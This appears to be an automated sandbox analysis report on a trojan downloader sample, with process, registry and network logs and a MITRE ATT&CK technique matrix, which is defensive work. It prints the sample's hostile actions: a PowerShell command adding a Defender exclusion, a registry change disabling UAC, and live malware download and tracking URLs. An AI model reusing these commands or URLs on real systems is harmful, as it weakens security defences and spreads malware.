Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe

Code function: 0_2_00007FF67DCB5490 cpuid

0_2_00007FF67DCB5490

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe

Code function: 0_2_00007FF67DD195DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF67DD195DC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disables UAC (registry)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA

Jump to behavior

Source: Amcache.hve.7.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	Windows Management Instrumentation	11 Scripting	1 Access Token Manipulation	11 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Registry Run Keys / Startup Folder	311 Process Injection	21 Disable or Modify Tools	LSASS Memory	21 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	2 Registry Run Keys / Startup Folder	41 Virtualization/Sandbox Evasion	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	1 Access Token Manipulation	NTDS	41 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	311 Process Injection	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	4 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Obfuscated Files or Information	DCSync	2 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	34 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	61%	ReversingLabs	Win64.Trojan.Amadey
SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	100%	Avira	TR/AD.Nekark.zljya

Source	Detection	Scanner	Label
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#	0%	URL Reputation	safe
http://c.pki.goog/r/gsr1.crl0	0%	Avira URL Cloud	safe
https://yip.su/RNWPd	0%	Avira URL Cloud	safe
http://crl.ver)	0%	Avira URL Cloud	safe
http://i.pki.goog/we1.crt0	0%	Avira URL Cloud	safe
http://yip.su	0%	Avira URL Cloud	safe
https://aka.ms/nativeaot-compatibilityy	0%	Avira URL Cloud	safe
https://g.live.com/odclientsettings/ProdV21C:	0%	Avira URL Cloud	safe
https://aka.ms/nativeaot-c	0%	Avira URL Cloud	safe
https://cdn.iplogger.org/favicon.ico	0%	Avira URL Cloud	safe
https://www.cloudflare.com/learning/access-management/phishing-attack/	0%	Avira URL Cloud	safe
https://iplogger.org/	0%	Avira URL Cloud	safe
https://pastebin.com/raw/V6VJsrV31https://yip.su/RNWPd.exe7https://iplogger.com/1djqU4	0%	Avira URL Cloud	safe
https://cdn.iplogger.org/redirect/logo-dark.png);background-position:center;background-repeat:no-rep	0%	Avira URL Cloud	safe
https://yip.su/redirect-	0%	Avira URL Cloud	safe
https://yip.su/RNWPd.exe	100%	Avira URL Cloud	malware
https://iplogger.com/1djqU4	0%	Avira URL Cloud	safe
https://www.cloudflare.com/5xx-error-landing	0%	Avira URL Cloud	safe
https://yip.sudd	0%	Avira URL Cloud	safe
https://pastebin.com/raw/V6VJsrV3	100%	Avira URL Cloud	malware
https://g.live.com/odclientsettings/Prod1C:	0%	Avira URL Cloud	safe
https://yip.su	0%	Avira URL Cloud	safe
http://i.pki.goog/gsr1.crt0-	0%	Avira URL Cloud	safe
https://counter.yadro.ru/hit?	0%	Avira URL Cloud	safe
https://iplogger.org/rules/	0%	Avira URL Cloud	safe
http://c.pki.goog/r/r4.crl0	0%	Avira URL Cloud	safe
http://o.pki.goog/s/we1/mus0%	0%	Avira URL Cloud	safe
http://i.pki.goog/r4.crt0	0%	Avira URL Cloud	safe
https://aka.ms/nativeaot-compatibility	0%	Avira URL Cloud	safe
https://pastebin.com	0%	Avira URL Cloud	safe
https://aka.ms/GlobalizationInvariantMode	0%	Avira URL Cloud	safe
https://aka.ms/nativeaot-compatibilityh	0%	Avira URL Cloud	safe
https://iplogger.org/privacy/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
yip.su	188.114.97.3	true	false	unknown
pastebin.com	104.20.4.235	true	true	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	unknown
iplogger.com	104.21.76.57	true	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://pastebin.com/raw/V6VJsrV3	true	Avira URL Cloud: malware	unknown
https://yip.su/RNWPd.exe	false	Avira URL Cloud: malware	unknown
https://iplogger.com/1djqU4	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.cloudflare.com/learning/access-management/phishing-attack/	MSBuild.exe, 00000007.00000002.4623253256.0000000003167000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	false	URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#	SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	false	URL Reputation: safe	unknown
http://ocsp.sectigo.com0	SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	false	URL Reputation: safe	unknown
https://aka.ms/nativeaot-c	SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	false	Avira URL Cloud: safe	unknown
http://yip.su	MSBuild.exe, 00000007.00000002.4623253256.00000000030CC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/nativeaot-compatibilityy	SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	false	Avira URL Cloud: safe	unknown
http://i.pki.goog/we1.crt0	MSBuild.exe, 00000007.00000002.4622387096.0000000001037000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://yip.su/RNWPd	MSBuild.exe, 00000007.00000002.4623253256.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030F3000.00000004.00000800.00020000.00000000.sdmp, OpxuPHiFHgdrtftYca7HLIbc.exe.7.dr, RrubXdXqzbveJvxl1Tifb4PD.exe.7.dr, d6stDH4n7YYIgzL0Ov3IxLa8.exe.7.dr, FMT2OeifGUTNfkZyqLG0jeEO.exe.7.dr, cl3vhpdkLtmoLXWJKBugbJDP.exe.7.dr, eTNltv0LYVQnDdBl6tKVEYLr.exe.7.dr, Zu7wa3hTioo41CyobTIbG45C.exe.7.dr, sOj9v5fBDMPcMK0zpX2B6CYH.exe.7.dr, UzLdRf9lIFGRsFA8wLSHgzsn.exe.7.dr, oqEo8V5wvVLKNc2VytL8EAsq.exe.7.dr	false	Avira URL Cloud: safe	unknown
https://cdn.iplogger.org/favicon.ico	MSBuild.exe, 00000007.00000002.4623253256.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030F3000.00000004.00000800.00020000.00000000.sdmp, OpxuPHiFHgdrtftYca7HLIbc.exe.7.dr, RrubXdXqzbveJvxl1Tifb4PD.exe.7.dr, d6stDH4n7YYIgzL0Ov3IxLa8.exe.7.dr, FMT2OeifGUTNfkZyqLG0jeEO.exe.7.dr, cl3vhpdkLtmoLXWJKBugbJDP.exe.7.dr, eTNltv0LYVQnDdBl6tKVEYLr.exe.7.dr, Zu7wa3hTioo41CyobTIbG45C.exe.7.dr, sOj9v5fBDMPcMK0zpX2B6CYH.exe.7.dr, UzLdRf9lIFGRsFA8wLSHgzsn.exe.7.dr, oqEo8V5wvVLKNc2VytL8EAsq.exe.7.dr	false	Avira URL Cloud: safe	unknown
http://c.pki.goog/r/gsr1.crl0	MSBuild.exe, 00000007.00000002.4622387096.000000000109D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://g.live.com/odclientsettings/ProdV21C:	svchost.exe, 00000009.00000003.2174242561.000002CA7A660000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr	false	Avira URL Cloud: safe	unknown
http://crl.ver)	svchost.exe, 00000009.00000002.3816448684.000002CA7A800000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://iplogger.org/	MSBuild.exe, 00000007.00000002.4623253256.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FF4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030F3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FF8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030E3000.00000004.00000800.00020000.00000000.sdmp, OpxuPHiFHgdrtftYca7HLIbc.exe.7.dr, RrubXdXqzbveJvxl1Tifb4PD.exe.7.dr, d6stDH4n7YYIgzL0Ov3IxLa8.exe.7.dr, FMT2OeifGUTNfkZyqLG0jeEO.exe.7.dr, cl3vhpdkLtmoLXWJKBugbJDP.exe.7.dr, eTNltv0LYVQnDdBl6tKVEYLr.exe.7.dr, Zu7wa3hTioo41CyobTIbG45C.exe.7.dr, sOj9v5fBDMPcMK0zpX2B6CYH.exe.7.dr, UzLdRf9lIFGRsFA8wLSHgzsn.exe.7.dr, oqEo8V5wvVLKNc2VytL8EAsq.exe.7.dr	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.7.dr	false	URL Reputation: safe	unknown
https://cdn.iplogger.org/redirect/logo-dark.png);background-position:center;background-repeat:no-rep	MSBuild.exe, 00000007.00000002.4623253256.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030F3000.00000004.00000800.00020000.00000000.sdmp, OpxuPHiFHgdrtftYca7HLIbc.exe.7.dr, RrubXdXqzbveJvxl1Tifb4PD.exe.7.dr, d6stDH4n7YYIgzL0Ov3IxLa8.exe.7.dr, FMT2OeifGUTNfkZyqLG0jeEO.exe.7.dr, cl3vhpdkLtmoLXWJKBugbJDP.exe.7.dr, eTNltv0LYVQnDdBl6tKVEYLr.exe.7.dr, Zu7wa3hTioo41CyobTIbG45C.exe.7.dr, sOj9v5fBDMPcMK0zpX2B6CYH.exe.7.dr, UzLdRf9lIFGRsFA8wLSHgzsn.exe.7.dr, oqEo8V5wvVLKNc2VytL8EAsq.exe.7.dr	false	Avira URL Cloud: safe	unknown
https://yip.su/redirect-	MSBuild.exe, 00000007.00000002.4623253256.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FF4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030F3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FF8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030E3000.00000004.00000800.00020000.00000000.sdmp, OpxuPHiFHgdrtftYca7HLIbc.exe.7.dr, RrubXdXqzbveJvxl1Tifb4PD.exe.7.dr, d6stDH4n7YYIgzL0Ov3IxLa8.exe.7.dr, FMT2OeifGUTNfkZyqLG0jeEO.exe.7.dr, cl3vhpdkLtmoLXWJKBugbJDP.exe.7.dr, eTNltv0LYVQnDdBl6tKVEYLr.exe.7.dr, Zu7wa3hTioo41CyobTIbG45C.exe.7.dr, sOj9v5fBDMPcMK0zpX2B6CYH.exe.7.dr, UzLdRf9lIFGRsFA8wLSHgzsn.exe.7.dr, oqEo8V5wvVLKNc2VytL8EAsq.exe.7.dr	false	Avira URL Cloud: safe	unknown
https://yip.sudd	MSBuild.exe, 00000007.00000002.4623253256.0000000003041000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://pastebin.com/raw/V6VJsrV31https://yip.su/RNWPd.exe7https://iplogger.com/1djqU4	SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe, 00000000.00000002.2168250882.0000019C1E400000.00000004.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4622227958.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.cloudflare.com/5xx-error-landing	MSBuild.exe, 00000007.00000002.4623253256.00000000030B0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0	SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	false	URL Reputation: safe	unknown
https://g.live.com/odclientsettings/Prod1C:	qmgr.db.9.dr	false	Avira URL Cloud: safe	unknown
https://counter.yadro.ru/hit?	MSBuild.exe, 00000007.00000002.4623253256.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FF4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030F3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FF8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030E3000.00000004.00000800.00020000.00000000.sdmp, OpxuPHiFHgdrtftYca7HLIbc.exe.7.dr, RrubXdXqzbveJvxl1Tifb4PD.exe.7.dr, d6stDH4n7YYIgzL0Ov3IxLa8.exe.7.dr, FMT2OeifGUTNfkZyqLG0jeEO.exe.7.dr, cl3vhpdkLtmoLXWJKBugbJDP.exe.7.dr, eTNltv0LYVQnDdBl6tKVEYLr.exe.7.dr, Zu7wa3hTioo41CyobTIbG45C.exe.7.dr, sOj9v5fBDMPcMK0zpX2B6CYH.exe.7.dr, UzLdRf9lIFGRsFA8wLSHgzsn.exe.7.dr, oqEo8V5wvVLKNc2VytL8EAsq.exe.7.dr	false	Avira URL Cloud: safe	unknown
https://yip.su	MSBuild.exe, 00000007.00000002.4623253256.0000000003041000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030CC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i.pki.goog/gsr1.crt0-	MSBuild.exe, 00000007.00000002.4622387096.000000000109D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z	SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	false	URL Reputation: safe	unknown
http://c.pki.goog/r/r4.crl0	MSBuild.exe, 00000007.00000002.4625191129.0000000005EF5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/nativeaot-compatibility	SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	false	Avira URL Cloud: safe	unknown
http://o.pki.goog/s/we1/mus0%	MSBuild.exe, 00000007.00000002.4622387096.0000000001037000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/nativeaot-compatibilityY	SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	false		unknown
https://iplogger.org/rules/	MSBuild.exe, 00000007.00000002.4623253256.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FF4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030F3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FF8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030E3000.00000004.00000800.00020000.00000000.sdmp, OpxuPHiFHgdrtftYca7HLIbc.exe.7.dr, RrubXdXqzbveJvxl1Tifb4PD.exe.7.dr, d6stDH4n7YYIgzL0Ov3IxLa8.exe.7.dr, FMT2OeifGUTNfkZyqLG0jeEO.exe.7.dr, cl3vhpdkLtmoLXWJKBugbJDP.exe.7.dr, eTNltv0LYVQnDdBl6tKVEYLr.exe.7.dr, Zu7wa3hTioo41CyobTIbG45C.exe.7.dr, sOj9v5fBDMPcMK0zpX2B6CYH.exe.7.dr, UzLdRf9lIFGRsFA8wLSHgzsn.exe.7.dr, oqEo8V5wvVLKNc2VytL8EAsq.exe.7.dr	false	Avira URL Cloud: safe	unknown
http://i.pki.goog/r4.crt0	MSBuild.exe, 00000007.00000002.4625191129.0000000005EF5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/GlobalizationInvariantMode	SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	MSBuild.exe, 00000007.00000002.4623253256.0000000002F71000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://pastebin.com	MSBuild.exe, 00000007.00000002.4623253256.0000000003041000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/nativeaot-compatibilityh	SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe, 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#	SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	false	URL Reputation: safe	unknown
